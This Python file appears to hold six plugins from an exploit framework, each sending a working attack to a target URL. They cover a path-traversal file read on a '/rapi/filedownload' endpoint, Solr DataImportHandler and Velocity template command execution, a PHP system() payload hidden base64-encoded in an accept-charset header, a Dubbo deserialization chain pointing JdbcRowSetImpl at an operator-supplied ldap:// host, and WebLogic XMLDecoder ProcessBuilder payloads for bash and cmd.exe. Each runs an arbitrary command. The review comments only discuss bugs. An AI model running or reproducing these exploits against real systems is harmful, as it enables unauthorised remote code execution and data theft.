def exploit(Url: str, RandomAgent: str, proxies: str = None, **kwargs) -> None:
    """Run this plugin's request sequence against ``Url`` and record the outcome.

    Args:
        Url: target URL; ``UrlProcessing().result`` splits it into scheme, host and port.
        RandomAgent: value sent as the ``User-Agent`` header.
        proxies: proxy specification, normalised by ``Proxies().result``.
        **kwargs: ``Command`` is read (required; its ``/`` characters are replaced
            by ``%2f`` and it is appended to the ``filter=path:`` query value).
            All kwargs are forwarded to ``Exploit(...).Write``.

    Returns:
        None. Output goes to ``ExploitOutput().Banner`` and ``Exploit(...).Write``;
        any exception raised inside the ``try`` is printed and passed to
        ``ErrorHandling``/``ErrorLog`` instead of propagating.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    # Default the port from the scheme only when UrlProcessing returned none.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # no-op; for any other scheme a None port stays None and is rendered as "None" below

    # NOTE(review): this line runs before the try block, so a missing "Command" kwarg
    # raises AttributeError to the caller rather than being routed to ErrorLog.
    command = kwargs.get("Command").replace("/", "%2f")
    try:
        payload_url = scheme + "://" + url + ":" + str(port)
        session = requests.Session()
        create_session(session, payload_url, proxies, RandomAgent)
        value = get_rand(session, payload_url, proxies, RandomAgent)
        create_session(session, payload_url, proxies, RandomAgent)  # create the connection again
        payload = command
        read_file_payload = payload_url + "/rapi/filedownload?filter=path:" + payload
        headers = {
            'User-Agent': RandomAgent,
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
            "Accept-Language":
            "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
            'Content-Type': 'application/xml',
            # Both NITRO values are fresh 8-character strings from the project's randoms() helper.
            'X-NITRO-USER': randoms().result(8),
            'X-NITRO-PASS': randoms().result(8),
            'rand_key': value  # whatever get_rand() returned for this session
        }
        data = '<clipermission></clipermission>'
        # verify=False disables TLS certificate validation for this request.
        resp = session.post(url=read_file_payload,
                            headers=headers,
                            timeout=6,
                            data=data,
                            verify=False,
                            proxies=proxies)
        con = resp.text
        ExploitOutput().Banner(OutputData=con)  # output helper, called with the response body (echo variant)
        _t = VulnerabilityInfo(con)
        Exploit(_t.info, url, **kwargs).Write()  # pass the url and the collected data to the writer
    except Exception as e:
        print(
            "\033[31m[ ! ] Execution error, the error message has been written in the log!\033[0m"
        )
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        # NOTE(review): if 'algroup' is absent, `_` is None and the concatenation below
        # raises TypeError from inside the error handler.
        ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url +
                         " || Exploit", e)  # write the URL and the failing plugin name to the log
def exploit(Url: str, RandomAgent: str, proxies: str = None, **kwargs) -> None:
    """Query ``/solr/admin/cores`` on ``Url``, then post to the last listed core's dataimport handler.

    Args:
        Url: target URL; ``UrlProcessing().result`` splits it into scheme, host and port.
        RandomAgent: value sent as the ``User-Agent`` header on both requests.
        proxies: proxy specification, normalised by ``Proxies().result``.
        **kwargs: ``Command`` is read (required; spaces are replaced by ``+`` and the
            result is substituted into ``data2``). All kwargs are forwarded to
            ``Exploit(...).Write``.

    Returns:
        None. If the cores response has no ``status`` key nothing further is sent.
        Any exception raised inside the ``try`` (including ``json.loads`` on a
        non-JSON body) is printed and passed to ``ErrorHandling``/``ErrorLog``.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    # Default the port from the scheme only when UrlProcessing returned none.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # no-op; for any other scheme a None port stays None and is rendered as "None" below

    # NOTE(review): runs before the try block, so a missing "Command" kwarg raises
    # AttributeError to the caller rather than being routed to ErrorLog.
    command = kwargs.get("Command").replace(' ','+')#replace spaces with '+'
    try:
        headers = {
            'User-Agent': RandomAgent,
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        payload_url = scheme + "://" + url + ":" + str(port) + '/solr/admin/cores'
        # NOTE(review): this GET keeps default certificate verification while the POST
        # below passes verify=False; the two requests are inconsistent on TLS handling.
        step1 = requests.get(payload_url, timeout=6, proxies=proxies, headers=headers).text
        data = json.loads(step1)
        if 'status' in data:
            name = ''
            # Keeps the last key iterated from data['status']; stays '' if it is empty.
            for x in data['status']:
                name = x
            payload = "/solr/" + name + "/dataimport?_=1582117587113&indent=on&wt=json"
            payload_url = scheme + "://" + url + ":" + str(port) + payload
            headers = {
                'User-Agent': RandomAgent,
                'Accept': 'application/json',
                "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
                "Accept-Encoding": "gzip, deflate",
                "Content-Type": "application/x-www-form-urlencoded",
                "X-Requested-With": "XMLHttpRequest"
            }
            # Pre-encoded form body; `command` is substituted at the `{}` placeholder.
            data2 = "command=full-import&verbose=false&clean=false&commit=true&debug=true&core=" + name + "&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22{}%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport".format(command)
            # verify=False disables TLS certificate validation for this request.
            resp = requests.post(payload_url, data=data2, headers=headers, proxies=proxies, timeout=6, verify=False)

            ExploitOutput().Banner()#output helper, no-echo variant (response body not shown)
            _t = VulnerabilityInfo(resp.text)
            Exploit(_t.info, url, **kwargs).Write()  # pass the url and the collected data to the writer
    except Exception as e:
        print("\033[31m[ ! ] Execution error, the error message has been written in the log!\033[0m")
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        # NOTE(review): if 'algroup' is absent, `_` is None and this concatenation raises TypeError inside the handler.
        ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url +" || Exploit", e)  # write the URL and the failing plugin name to the log
def exploit(Url: str, RandomAgent: str, proxies: str = None, **kwargs) -> None:
    """GET ``/index.php`` on ``Url`` with a base64 value in the ``accept-charset`` header and record the outcome.

    Args:
        Url: target URL; ``UrlProcessing().result`` splits it into scheme, host and port.
        RandomAgent: value sent as the ``User-Agent`` header.
        proxies: proxy specification, normalised by ``Proxies().result``.
        **kwargs: ``Command`` is read and substituted into ``commandS``; a missing
            value is formatted as the text ``None`` (no exception). All kwargs are
            forwarded to ``Exploit(...).Write``.

    Returns:
        None. Any exception raised inside the ``try`` is printed and passed to
        ``ErrorHandling``/``ErrorLog`` instead of propagating.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    # Default the port from the scheme only when UrlProcessing returned none.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # no-op; for any other scheme a None port stays None and is rendered as "None" below

    command = kwargs.get("Command")
    try:
        payload = "/index.php"
        commandS = ('''system("{}");''').format(command)
        # b64encode returns bytes, so `cmd` is a bytes header value (requests accepts bytes here).
        cmd = base64.b64encode(commandS.encode('utf-8'))
        payload_url = scheme + "://" + url + ':' + str(port) + payload
        headers = {
            'Sec-Fetch-Mode': 'navigate',
            'Sec-Fetch-User': '******',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
            'Sec-Fetch-Site': 'none',
            'accept-charset': cmd,  # carries the base64 value built above, not a charset
            'Accept-Encoding': 'gzip,deflate',
            'Accept-Language': 'zh-CN,zh;q=0.9',
            'User-Agent': RandomAgent
        }
        # verify=False disables TLS certificate validation for this request.
        resp = requests.get(payload_url,
                            headers=headers,
                            timeout=5,
                            proxies=proxies,
                            verify=False)
        con = resp.text
        ExploitOutput().Banner()  # output helper, no-echo variant (response body not shown)
        _t = VulnerabilityInfo(con)
        Exploit(_t.info, url, **kwargs).Write()  # pass the url and the collected data to the writer
    except Exception as e:
        print(
            "\033[31m[ ! ] Execution error, the error message has been written in the log!\033[0m"
        )
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        # NOTE(review): if 'algroup' is absent, `_` is None and the concatenation below
        # raises TypeError from inside the error handler.
        ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url +
                         " || Exploit", e)  # write the URL and the failing plugin name to the log
def exploit(Url: str, RandomAgent: str, proxies: str = None, **kwargs) -> None:
    """Send one Dubbo request to ``Url`` via ``DubboClient`` and record the response.

    Args:
        Url: target URL; ``UrlProcessing().result`` splits it into scheme, host and port.
        RandomAgent: accepted for interface consistency with the other plugins but
            not used here (no HTTP request is made).
        proxies: normalised by ``Proxies().result`` but likewise unused afterwards;
            ``DubboClient`` is given only the host and port.
        **kwargs: ``ExploitUrl`` is read and prefixed with ``ldap://``. All kwargs
            are forwarded to ``Exploit(...).Write``.

    Returns:
        None. ``int(port)`` on a None port, or a missing ``ExploitUrl`` (``str + None``),
        raises inside the ``try`` and is therefore printed and logged, not propagated.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    # Default the port from the scheme only when UrlProcessing returned none.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # no-op; for any other scheme the port stays as returned (possibly None)

    ExploitUrl = kwargs.get("ExploitUrl")
    try:

        client = DubboClient(url, int(port))

        # Object graph built with the project's new_object() helper; its serialization
        # is handled by DubboClient and is not visible here.
        JdbcRowSetImpl = new_object('com.sun.rowset.JdbcRowSetImpl',
                                    dataSource="ldap://" + ExploitUrl,
                                    strMatchColumns=["foo"])
        JdbcRowSetImplClass = new_object(
            'java.lang.Class',
            name="com.sun.rowset.JdbcRowSetImpl",
        )
        toStringBean = new_object('com.rometools.rome.feed.impl.ToStringBean',
                                  beanClass=JdbcRowSetImplClass,
                                  obj=JdbcRowSetImpl)

        resp = client.send_request_and_return_response(
            service_name=
            'org.apache.dubbo.spring.boot.sample.consumer.DemoService',
            # Original author's note: the method name here may be $invoke, $invokeSync,
            # $echo, etc.; they claim it covers 2.7.7 and every version named in the CVE.
            method_name='$invoke',
            args=[toStringBean])
        ExploitOutput().Banner()  # output helper, no-echo variant (response not shown)
        _t = VulnerabilityInfo(str(resp))
        Exploit(_t.info, url, **kwargs).Write()  # pass the url and the collected data to the writer
    except Exception as e:
        print(
            "\033[31m[ ! ] Execution error, the error message has been written in the log!\033[0m"
        )
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        # NOTE(review): if 'algroup' is absent, `_` is None and the concatenation below
        # raises TypeError from inside the error handler.
        ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url +
                         " || Exploit", e)  # write the URL and the failing plugin name to the log
def exploit(Url: str, RandomAgent: str, proxies: str = None, **kwargs) -> None:
    """POST an OS-specific SOAP body to ``/wls-wsat/CoordinatorPortType`` on ``Url`` and record the outcome.

    Args:
        Url: target URL; ``UrlProcessing().result`` splits it into scheme, host and port.
        RandomAgent: value sent as the ``User-Agent`` header.
        proxies: proxy specification, normalised by ``Proxies().result``.
        **kwargs: ``Command`` is substituted into both templates (a missing value is
            formatted as the text ``None``); ``OperatingSystem`` selects the template
            (``"windows"`` or ``"linux"``; any other value sends an empty body).
            All kwargs are forwarded to ``Exploit(...).Write``.

    Returns:
        None. Any exception raised inside the ``try`` is printed and passed to
        ``ErrorHandling``/``ErrorLog`` instead of propagating.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    # Default the port from the scheme only when UrlProcessing returned none.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # no-op; for any other scheme a None port stays None and is rendered as "None" below

    command = kwargs.get("Command")

    # Both templates are fully built here, before the try block and before the OS choice.
    linux_data = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
    <java version="1.4.0" class="java.beans.XMLDecoder">
    <void class="java.lang.ProcessBuilder">
    <array class="java.lang.String" length="3">
    <void index="0">
    <string>/bin/bash</string>
    </void>
    <void index="1">
    <string>-c</string>
    </void>
    <void index="2">
    <string>{}</string>
    </void>
    </array>
    <void method="start"/></void>
    </java>
    </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
    </soapenv:Envelope>'''.format(command)
    # NOTE(review): non-raw literal containing `\W` and `\S`; Python keeps the backslashes
    # literally but newer interpreters warn about the invalid escape sequences.
    windows_data = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
      <soapenv:Header>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
            <java version="1.8.0_131" class="java.beans.XMLDecoder">
              <void class="java.lang.ProcessBuilder">
                <array class="java.lang.String" length="3">
                  <void index="0">
                    <string>C:\Windows\System32\cmd.exe</string>
                  </void>
                  <void index="1">
                    <string>/c</string>
                  </void>
                  <void index="2">
                    <string>{}</string>
                  </void>
                </array>
              <void method="start"/></void>
            </java>
          </work:WorkContext>
        </soapenv:Header>
      <soapenv:Body/>
    </soapenv:Envelope>
    '''.format(command)
    data = ""  # stays empty (and is still POSTed) if OperatingSystem is neither value below
    if kwargs.get("OperatingSystem") == "windows":
        data = windows_data
    elif kwargs.get("OperatingSystem") == "linux":
        data = linux_data
    try:
        payload = '/wls-wsat/CoordinatorPortType'
        payload_url = scheme + "://" + url + ":" + str(port) + payload

        headers = {
            'User-Agent': RandomAgent,
            "Accept-Language":
            "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
            "Content-Type": "text/xml",
        }
        # verify=False disables TLS certificate validation for this request.
        resp = requests.post(payload_url,
                             headers=headers,
                             data=data,
                             proxies=proxies,
                             timeout=6,
                             verify=False)
        con = resp.text
        ExploitOutput().Banner()  # output helper, no-echo variant (response body not shown)
        _t = VulnerabilityInfo(con)
        Exploit(_t.info, url, **kwargs).Write()  # pass the url and the collected data to the writer
    except Exception as e:
        print(
            "\033[31m[ ! ] Execution error, the error message has been written in the log!\033[0m"
        )
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        # NOTE(review): if 'algroup' is absent, `_` is None and the concatenation below
        # raises TypeError from inside the error handler.
        ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url +
                         " || Exploit", e)  # write the URL and the failing plugin name to the log
def exploit(Url: str, RandomAgent: str, proxies: str = None, **kwargs) -> None:
    """Query ``/solr/admin/cores`` on ``Url``, POST a config change to the last listed core, then GET its select handler.

    Args:
        Url: target URL; ``UrlProcessing().result`` splits it into scheme, host and port.
        RandomAgent: value sent as the ``User-Agent`` header on every request.
        proxies: proxy specification, normalised by ``Proxies().result``.
        **kwargs: ``Command`` is read (required; spaces are replaced by ``+`` and the
            result is substituted into ``payload2``). All kwargs are forwarded to
            ``Exploit(...).Write``.

    Returns:
        None. If the cores response has no ``status`` key nothing further is sent.
        Note that the config POST response (``resp``) feeds ``VulnerabilityInfo``
        while the select GET response (``con2``) is only shown via ``Banner``.
        Any exception raised inside the ``try`` is printed and passed to
        ``ErrorHandling``/``ErrorLog`` instead of propagating.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    # Default the port from the scheme only when UrlProcessing returned none.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # no-op; for any other scheme a None port stays None and is rendered as "None" below

    # NOTE(review): runs before the try block, so a missing "Command" kwarg raises
    # AttributeError to the caller rather than being routed to ErrorLog.
    command = kwargs.get("Command").replace(' ', '+')  #replace spaces with '+'
    try:
        headers = {
            'User-Agent':
            RandomAgent,
            'Content-Type':
            'application/x-www-form-urlencoded',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        payload_url = scheme + "://" + url + ":" + str(
            port) + '/solr/admin/cores'
        # NOTE(review): this GET keeps default certificate verification while the two
        # requests below pass verify=False; TLS handling is inconsistent within the block.
        step1 = requests.get(payload_url,
                             timeout=6,
                             proxies=proxies,
                             headers=headers).text
        data = json.loads(step1)
        if 'status' in data:
            name = ''
            # Keeps the last key iterated from data['status']; stays '' if it is empty.
            for x in data['status']:
                name = x
            payload = "/solr/" + name + "/config"
            # Pre-encoded query string; `command` is substituted at the `{}` placeholder.
            payload2 = '/solr/' + name + '/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27{}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end'.format(
                command)
            payload_url1 = scheme + "://" + url + ":" + str(port) + payload
            payload_url2 = scheme + "://" + url + ":" + str(port) + payload2
            # JSON body for the config POST (sent as a plain string, not via json=).
            payload_data = """{
              "update-queryresponsewriter": {
                "startup": "lazy",
                "name": "velocity",
                "class": "solr.VelocityResponseWriter",
                "template.base.dir": "",
                "solr.resource.loader.enabled": "true",
                "params.resource.loader.enabled": "true"
              }
            }"""
            headers1 = {
                'User-Agent': RandomAgent,
                'Content-Type': 'application/json',
                'Accept':
                'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
                'Accept-Language':
                'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
                'Accept-Encoding': 'gzip, deflate',
            }
            # verify=False disables TLS certificate validation on both requests below.
            resp = requests.post(payload_url1,
                                 data=payload_data,
                                 headers=headers1,
                                 proxies=proxies,
                                 timeout=6,
                                 verify=False)
            # Reuses the form-encoded `headers` dict from the first GET.
            resp2 = requests.get(payload_url2,
                                 headers=headers,
                                 timeout=6,
                                 proxies=proxies,
                                 verify=False)
            con2 = resp2.text
            ExploitOutput().Banner(OutputData=con2)  # output helper, called with the select response body
            _t = VulnerabilityInfo(resp.text)  # note: built from the config POST response, not con2
            Exploit(_t.info, url, **kwargs).Write()  # pass the url and the collected data to the writer
    except Exception as e:
        print(
            "\033[31m[ ! ] Execution error, the error message has been written in the log!\033[0m"
        )
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        # NOTE(review): if 'algroup' is absent, `_` is None and the concatenation below
        # raises TypeError from inside the error handler.
        ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url +
                         " || Exploit", e)  # write the URL and the failing plugin name to the log